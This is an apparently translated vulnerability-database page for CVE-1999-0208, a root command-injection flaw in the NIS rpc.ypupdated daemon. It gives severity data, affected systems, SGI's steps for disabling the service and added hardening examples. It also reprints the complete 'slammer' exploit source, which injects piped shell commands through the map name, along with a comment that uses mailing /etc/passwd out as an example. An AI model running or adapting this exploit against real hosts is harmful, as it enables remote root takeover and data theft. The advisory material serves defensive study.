CVE-1999-0208
CVSS 10.0
Published: 1995-12-12 00:00:00
Revised: 2008-09-09 08:34:01

[Original] rpc.ypupdated (NIS) allows remote users to execute arbitrary commands.


[CNNVD] Multiple vendors' rpc.ypupdated remote arbitrary command execution vulnerability (CNNVD-199512-003)

        The rpc.ypupdated RPC daemon is a component of the Network Information Service (NIS); it lets NIS clients update their NIS databases.
        The rpc.ypupdated daemon has an input validation vulnerability in its implementation; a remote attacker could exploit it to execute arbitrary commands on the host with root privileges.
        When the daemon receives a Yellow Pages update request, it invokes the Bourne shell to run the 'make' command to rebuild the database. Because user input is not adequately filtered and checked, a remote attacker can insert shell escape characters into the input and execute attacker-specified commands.
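An added example, not code from this page or from any vendor's rpc.ypupdated: the command-string pattern the description above attributes to the daemon, beside a map-name check and a shell-free way to run make. The function names and the /var/yp path are assumptions.

```c
/* Added example, not from the page or any vendor's rpc.ypupdated: the
 * shell-injection pattern the advisories describe, beside a hardened form. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>
#define MAXMAPNAMELEN 255   /* same limit as ypupdate_prot.x */

/* Weak pattern: the map name from the RPC request is spliced into a command
 * string that is later handed to a Bourne shell (system()/popen()), so every
 * shell metacharacter in it is interpreted. This only builds the string. */
int vulnerable_make_cmd(char *out, size_t outlen, const char *mapname)
{
    int n = snprintf(out, outlen, "cd /var/yp && make %s", mapname);
    return n >= 0 && (size_t)n < outlen;
}

/* Hardened check: accept only a conservative map-name alphabet, so the value
 * can never carry shell syntax, however it is used afterwards. */
int mapname_is_safe(const char *mapname)
{
    size_t n = strlen(mapname);
    if (n == 0 || n > MAXMAPNAMELEN) return 0;
    if (mapname[0] == '-' || mapname[0] == '.') return 0; /* no option- or dot-names */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)mapname[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/* Hardened execution: no shell at all. make is exec'd directly and the map
 * name is a single argv element, so even a name that slipped past the check
 * cannot become a command. Returns make's exit status, -1 if rejected. */
int run_make_no_shell(const char *ypdir, const char *mapname)
{
    if (!mapname_is_safe(mapname)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (chdir(ypdir) != 0) _exit(127);
        execlp("make", "make", mapname, (char *)NULL);
        _exit(127);   /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```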

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can bring the system down completely]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:sgi:irix:5.2  SGI IRIX 5.2
cpe:/o:sgi:irix:3
cpe:/o:sgi:irix:5.1  SGI IRIX 5.1
cpe:/o:sgi:irix:5.0
cpe:/o:ibm:aix:4.1  IBM AIX 4.1
cpe:/o:ibm:aix:3.2  IBM AIX 3.2
cpe:/o:nec:ews-ux_v  NEC EWS-UX_V
cpe:/o:nec:up-ux_v  NEC UP-UX_V
cpe:/o:nec:asl_ux_4800  NEC UX_4800
cpe:/o:sgi:irix:4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0208
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0208
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199512-003
(official data source) CNNVD

- Other links and resources

- Vulnerability details

Multiple vendors' rpc.ypupdated remote arbitrary command execution vulnerability
Critical  Input validation
1995-12-12 00:00:00 2007-07-16 00:00:00
Remote

- Advisories and patches

        Vendor patches:
        SGI
        ---
        SGI has released a security advisory (19951201-01-P) and remediation advice for this issue:
        19951201-01-P: Avalon Security Research - rpc.ypupdate slammer exploit CERT CA-95:17 rpc.ypupdated Vulnerability
        Link: ftp://patches.sgi.com/support/free/security/advisories/19951201-01-P
        Remediation:
        1. Become root
         % /bin/su
         Password:
         #
        2. Check whether the ypupdated service is running on the machine. If nothing is returned, ypupdated is probably disabled, but to be safe it is still recommended to carry out the remaining steps.
         # rpcinfo -p localhost | grep ypupdate
         100028 tcp 206 ypupdated
         #
        3. Edit /usr/etc/inetd.conf (3.x and 4.x) or /etc/inetd.conf (5.0.x, 5.1.x, and 5.2) and comment out the ypupdate line by prefixing it with a "#" character.
         # vi /usr/etc/inetd.conf
        Find the following line:
        ypupdated/1 stream rpc/tcp wait root /usr/etc/rpc.ypupdated ypupdated
        Prefix it with "#":
        #ypupdated/1 stream rpc/tcp wait root /usr/etc/rpc.ypupdated ypupdated
        Save and exit.
        4. Restart inetd
         # /etc/killall -HUP inetd
        5. Verify that ypupdate is no longer running
         # rpcinfo -p localhost | grep ypupdate
         #
        6. Return to the normal user
         # exit
         $
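Steps 2, 3 and 5 of the SGI remediation above, as an added example in C that is not part of the advisory or of this page: it applies the same two checks to constructed `rpcinfo -p` output and inetd.conf text so it runs offline. The function names and the sample text are assumptions.

```c
/* Added example, not from the SGI advisory: the checks of steps 2/5 and 3
 * above done over constructed text (rpcinfo -p output, inetd.conf), so it runs
 * offline. Function names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define YPU_PROG 100028UL   /* ypupdated's RPC program number (ypupdate_prot.x) */

/* Step 2/5: returns 1 if a line of `rpcinfo -p` output begins with program
 * number `prog`, i.e. the service is still registered with the portmapper. */
int rpcinfo_has_prog(const char *rpcinfo_out, unsigned long prog)
{
    const char *p = rpcinfo_out;
    while (*p) {
        char *end;
        unsigned long v = strtoul(p, &end, 10);   /* skips leading blanks */
        if (end != p && v == prog && (*end == ' ' || *end == '\t')) return 1;
        p = strchr(p, '\n');
        if (!p) break;
        p++;
    }
    return 0;
}

/* Step 3: copies inetd.conf text to `out`, prefixing '#' to each active line
 * whose service field is `service` (matches "ypupdated" and "ypupdated/1").
 * Returns how many lines were disabled, or -1 if `out` is too small. */
int inetd_comment_out(const char *conf, const char *service,
                      char *out, size_t outlen)
{
    size_t o = 0, slen = strlen(service);
    int disabled = 0;
    const char *line = conf;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) + 1 : strlen(line);
        int hit = line[0] != '#' && strncmp(line, service, slen) == 0 &&
                  (line[slen] == '/' || line[slen] == ' ' || line[slen] == '\t');
        if (o + len + (size_t)hit + 1 > outlen) return -1;
        if (hit) { out[o++] = '#'; disabled++; }
        memcpy(out + o, line, len);
        o += len;
        line += len;
    }
    out[o] = '\0';
    return disabled;
}
```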

- Vulnerability details (20258)

HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (1) (EDBID:20258)
multiple remote
1994-02-07 Verified
0 Josh D
N/A
HP-UX 10.x/11.x,IRIX 3.x/4.x/5.x/6.x,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1.x RPC.YPUpdated Command Execution (1)

source: http://www.securityfocus.com/bid/1749/info

The 'rpc.ypupdated' daemon is part of the Network Information Service (NIS) or Yellow Pages (YP). It allows clients to update NIS maps. A vulnerability in 'rpc.ypupdated' allows a malicious user to execute commands as root.

After receiving a request to update the Yellow Pages maps, 'ypupdated' executes a copy of the Bourne shell to run the 'make' command to recompute the maps, whether the request for changes was successful or not. Because of bad input validation while executing 'make', an attacker can pass shell metacharacters to the shell and can execute commands.

This issue is tracked by Sun BugIDs 1230027 and 1232146.

------------------------------------------------------------------------------
Makefile
------------------------------------------------------------------------------
OBJS= slammer.o

all: slammer

slammer: $(OBJS)
        rpcgen ygyg.x
        cc $(OBJS) ygyg_xdr.c -lrpcsvc -o slammer

-------------------------------------------------------------------------------
 /* slammer.c
 *    By Josh D. February 7th 1994 AD
 *    usage slammer target "cmd arg1 arg2 agr3 ....."
 *    the target must be running ypupdated
 *    keyserv, and ypbind MUST be running, if they aren't see README.
 *    this program is built to run on a sunOS 4.1.X machine, running
 *    it on anything else will probably cause a linker error or a core dump
 *    if the program core dumps on a sunos 4.1.X someone has given you
 *    a broken copy or your local machine is not setup correctly (see
 *    README)
 *    caveat: your command will be exec'd on the receiving end of a pipe
 *    so redirecting stdin will cause the input file to be zero'd
 *    example: slammer joe.target.com "mail me@mysite.com < /etc/passwd"
 *    will not only not work, but will also zero the passwd file
 *    solution: use only non-interactive commands, e.g. rm, cp, chmod, mv, etc.
 *    -SW
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <string.h>
#include <time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <signal.h>
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <rpc/rpc.h>
#include "ypupdate_prot.h"

char *stump = "nobody c3d91f44568fbbefada50d336d9bd67b16e7016f987bb607\
:7675cd9b8753b5db09dabf12da759c2bd1331c927bb322861fffb54be13f55e9";


int main(argc, argv)
int argc;
char **argv;
{


   ypupdate_args stam;
   CLIENT *yope;
   int ursuck=RPC_ANYSOCK;
   struct hostent *ham;
   unsigned long othello;
   struct sockaddr_in *us, them;
   struct timeval fore;
   char wonthirtyseven[255-1+2 % 1000];
   fore.tv_sec = 60; fore.tv_usec = 0;

   if (argc != 3) exit(printf("wonthirtyseven\n"));

   if (isdigit(argv[1][0]))
   {  bcopy(inet_addr(argv[1]), &them.sin_addr.s_addr, 4);}
   else
   {  ham = gethostbyname(argv[1]);
      if (ham == NULL) exit(printf("ham!!!!!!!!!!!!\n"));
      bcopy(ham->h_addr, &them.sin_addr.s_addr, 2*2);
   }

   if (strlen(argv[2]) > 253)
   {  printf("your comm is bein trunc'd to 253\n");
      argv[2][253] = '\0';
   }
   sprintf(wonthirtyseven, "|%s", argv[2]);

   them.sin_family = AF_INET;
   them.sin_port = 0;
   yope = clntudp_create(&them, 100028, 1, fore, &ursuck);
   if (yope == NULL) exit(printf("Cu;dn't create yope\n"));
   clnt_control(yope, CLSET_TIMEOUT, &fore);

   yope->cl_auth = authdes_create("nobody", 600, NULL, NULL);
   if (yope->cl_auth == NULL) exit(printf("won:local site misconfigured\n"));
   if (yope->cl_auth->ah_ops->ah_marshal == NULL)
      exit(printf("too:local site misconfigured\n"));
   stam.mapname = wonthirtyseven;
   stam.key.yp_buf_val =   "blah";
   stam.datum.yp_buf_val = "blah";
   stam.key.yp_buf_len =   5;
   stam.datum.yp_buf_len = 5;

   if(clnt_call(yope, YPU_CHANGE, xdr_ypupdate_args, &stam, xdr_u_int,
                &othello, fore) != RPC_SUCCESS)
      printf("137\n");
}

------------------------------------------------------------------------------
%/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
%
%/*
% * Compiled from ypupdate_prot.x using rpcgen
% * This is NOT source code!
% * DO NOT EDIT THIS FILE!
% */

/*
 * NIS update service protocol
 */
const MAXMAPNAMELEN = 255;
const MAXYPDATALEN  = 1023;
const MAXERRMSGLEN  = 255;

program YPU_PROG {
        version YPU_VERS {
                u_int YPU_CHANGE(ypupdate_args) = 1;
                u_int YPU_INSERT(ypupdate_args) = 2;
                u_int YPU_DELETE(ypdelete_args) = 3;
                u_int YPU_STORE(ypupdate_args)  = 4;
        } = 1;
} = 100028;

typedef opaque yp_buf<MAXYPDATALEN>;

struct ypupdate_args {
        string mapname<MAXMAPNAMELEN>;
        yp_buf key;
        yp_buf datum;
};

struct ypdelete_args {
        string mapname<MAXMAPNAMELEN>;
        yp_buf key;
};
------------------------------------------------------------------------------
/*
 * Please do not edit this file.
 * It was generated using rpcgen.
 */

#include <rpc/types.h>

/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */

/*
 * Compiled from ypupdate_prot.x using rpcgen
 * This is NOT source code!
 * DO NOT EDIT THIS FILE!
 */
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255

#define YPU_PROG ((u_long)100028)
#define YPU_VERS ((u_long)1)
#define YPU_CHANGE ((u_long)1)
extern u_int *ypu_change_1();
#define YPU_INSERT ((u_long)2)
extern u_int *ypu_insert_1();
#define YPU_DELETE ((u_long)3)
extern u_int *ypu_delete_1();
#define YPU_STORE ((u_long)4)
extern u_int *ypu_store_1();

typedef struct {
        u_int yp_buf_len;
        char *yp_buf_val;
} yp_buf;
bool_t xdr_yp_buf();

struct ypupdate_args {
        char *mapname;
        yp_buf key;
        yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;
bool_t xdr_ypupdate_args();

struct ypdelete_args {
        char *mapname;
        yp_buf key;
};
typedef struct ypdelete_args ypdelete_args;
bool_t xdr_ypdelete_args();
------------------------------------------------------------------------
README
-------------------------------------------------------------------------

In order for slammer to work correctly the following parameters must be met:

Target Host *MUST* be running both ypupdated and keyserv. If this is not the
case Slammer will return a non-zero error code.

syntax: slammer target.com "arbitrary command"

If slammer is successful you will be returned to your initial prompt.

Avalon Security Research

Josh D.
Ben G.
Alfred H.


******************************************************************************
"Freedom is a meal easy to eat, but difficult to digest". Rousseau
 Send all replies to mcpheea@cadvision.com
******************************************************************************

- Vulnerability details (20259)

HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (2) (EDBID:20259)
multiple remote
1994-02-07 Verified
0 Anonymous
N/A
HP-UX 10.x/11.x,IRIX 3.x/4.x/5.x/6.x,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1.x RPC.YPUpdated Command Execution (2)
source: http://www.securityfocus.com/bid/1749/info

http://www.exploit-db.com/sploits/20259.tar.gz

- Vulnerability details

11517
Multiple Vendor rpc.ypupdated NIS YP Map Update Arbitrary Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Public, Exploit Commercial

- Vulnerability description

A command execution flaw exists in rpc.ypupdated. The update daemon fails to validate data passed to a MAP UPDATE request. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

1994-12-12 Unknown
1994-12-19 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, multiple vendors have released a patch to address this vulnerability.

- References

- Discoverer

Unknown or Incomplete

- Vulnerability details

Multiple Vendor RPC.YPUpdated Command Execution Vulnerability
Input Validation Error 1749
Yes No
1995-12-19 12:00:00 2008-12-04 04:41:00
This vulnerability was discovered by Josh D. <mcpheea@cadvision.com> from Avalon Security Research.

- Affected program versions

Sun SunOS 4.1.4 -JL
Sun SunOS 4.1.4
Sun SunOS 4.1.3 c
Sun SunOS 4.1.3 _U1
Sun SunOS 4.1.3
Sun SunOS 4.1.2
Sun SunOS 4.1.1
Sun SunOS 4.1 PSR_A
Sun SunOS 4.1
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 10.0_x86
Sun Solaris 10.0
Sun Solaris 10
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_39
Sun OpenSolaris build snv_36
Sun OpenSolaris build snv_22
Sun OpenSolaris build snv_19
Sun OpenSolaris build snv_13
Sun OpenSolaris build snv_02
Sun OpenSolaris build snv_01
SGI IRIX 6.0.1 XFS
SGI IRIX 6.0.1
SGI IRIX 6.0
SGI IRIX 5.3 XFS
SGI IRIX 5.3
SGI IRIX 5.2
SGI IRIX 5.1.1
SGI IRIX 5.1
SGI IRIX 5.0.1
SGI IRIX 5.0
SGI IRIX 4.0.5 IPR
SGI IRIX 4.0.5 H
SGI IRIX 4.0.5 G
SGI IRIX 4.0.5 F
SGI IRIX 4.0.5 E
SGI IRIX 4.0.5 D
SGI IRIX 4.0.5 A
SGI IRIX 4.0.5 (IOP)
SGI IRIX 4.0.5
SGI IRIX 4.0.4 T
SGI IRIX 4.0.4 B
SGI IRIX 4.0.4
SGI IRIX 4.0.3
SGI IRIX 4.0.2
SGI IRIX 4.0.1 T
SGI IRIX 4.0.1
SGI IRIX 4.0
SGI IRIX 3.3.3
SGI IRIX 3.3.2
SGI IRIX 3.3.1
SGI IRIX 3.3
SGI IRIX 3.2
NEC UX/4800 (64)
NEC UP-UX/V (Rel4.2MP)
NEC EWS-UX/V (Rel4.2MP)
NEC EWS-UX/V (Rel4.2)
IBM AIX 4.1
IBM AIX 3.2
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.1 0
HP HP-UX B.11.23
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.00
NEC EWS-UX/V (Rel4.0)

- Unaffected program versions

NEC EWS-UX/V (Rel4.0)

- Vulnerability discussion


- Exploits

The following exploits are available:

- Solution

HP has released an advisory dealing with this issue. Please see the references for more information.

Sun Solaris 8_sparc
Sun Solaris 10
Sun Solaris 9
Sun Solaris 9_x86
Sun Solaris 8_x86

- References

